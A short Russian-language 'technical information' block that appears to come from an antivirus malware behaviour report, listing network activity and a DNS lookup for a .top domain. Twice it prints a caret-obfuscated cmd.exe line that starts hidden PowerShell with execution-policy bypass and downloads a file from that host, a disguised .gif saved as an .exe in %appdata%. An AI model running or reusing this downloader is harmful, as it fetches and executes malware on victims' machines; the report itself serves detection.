Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^owERS^H^eL^l.E^x^e^ ^-EXECu^tIoNpoL^Icy BYpASs ^-^n^oprOFiLe^ -WI^nd^Ow^StYle hi^DD^e^N ^(NeW-^OB^JE^Ct^ ^S^ysT^Em.^nEt.WE^BC^L^ient)^.DO^wnlOA^d^FiLE('http://www.doorasope.top/read...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "P^owERS^H^eL^l.E^x^e^ ^-EXECu^tIoNpoL^Icy BYpASs ^-^n^oprOFiLe^ -WI^nd^Ow^StYle hi^DD^e^N ^(NeW-^OB^JE^Ct^ ^S^ysT^Em.^nEt.WE^BC^L^ient)^.DO^wnlOA^d^FiLE('http://www.doorasope.top/read...' (со скрытым окном)